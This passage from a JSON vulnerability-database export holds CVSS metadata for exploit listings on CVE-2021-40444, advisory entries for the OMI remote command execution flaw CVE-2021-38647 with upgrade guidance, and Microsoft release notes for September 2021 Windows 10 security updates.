CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "saint": [{"lastseen": "2021-11-26T18:36:50", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T20:31:18", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:53:10", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:E5FBEA63E5EE8A91F5066541141037D1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-06-23T19:39:05", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005569 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006675 \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of KB5005569 are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5007207. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006675. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005569>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005569](<https://download.microsoft.com/download/0/2/c/02c04258-371f-4004-a331-b8c5e28ca23f/5005569.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005569 (OS Build 10240.19060)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005569", "href": "https://support.microsoft.com/en-us/help/5005569", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:03", "description": "None\n**8/24/2021** \n**IMPORTANT **Starting in October 2021, there will no longer be optional, non-security releases (known as \"C\" releases) for Windows 10, version 1909. Only cumulative monthly security updates (known as the \"B\" or Update Tuesday release) will continue for Windows 10, version 1909. \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 18363.1790\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005566 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5005624. \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005566 are unaffected and print operations to that printer will succeed as usual.**Note **IPP is not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5007189. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006667. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:You must install the July 13, 2021 SSU (KB5004748) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005566>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005566](<https://download.microsoft.com/download/3/9/1/391ffcb2-7fdf-47e1-97cd-fe18abaf022c/5005566.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 18363.1790](<https://download.microsoft.com/download/e/8/0/e8002328-8c8e-43f7-b25d-eb0bdf7c541b/SSU_version_18362_1790.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005566 (OS Build 18363.1801)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005566", "href": "https://support.microsoft.com/en-us/help/5005566", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:05", "description": "None\n**7/13/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents users from tracking Distributed Component Object Model (DCOM) activation failures.\n * Addresses an issue that might cause a memory leak to occur during prolonged Remote Desktop audio redirection.\n * Addresses an issue that causes a non-paged memory leak in the **FLTMGR.SYS** driver. This issue occurs because of a reference count issue in the **DFS.SYS** driver during cluster failover. As a result, the system might become unresponsive.\n * Addresses an issue with using the **robocopy **command with the backup option (**/B**) to fix copy failures. This issue occurs when the source files contain Alternate Data Streams (ADS) or Extended Attributes (EA) and the destination is an Azure Files share.\n * Addresses an issue that causes Authentication Mechanism Assurance (AMA) to stop working. This issue occurs when you migrate to Windows Server 2016 (or newer versions of Windows) and when using AMA in conjunction with certificates from Windows Hello for Business.\n * Addresses an issue that prevents you from writing to a Windows Management Instrumentation (WMI) repository after a low memory condition occurs.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005573 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006669. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of KB5005573 are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006669. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations. | This issue is resolved in KB5006669. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5005698) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005573>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005573](<https://download.microsoft.com/download/a/d/7/ad771634-3af1-42dd-8d0f-12af05be853d/5005573.csv>).\n", "cvss3": 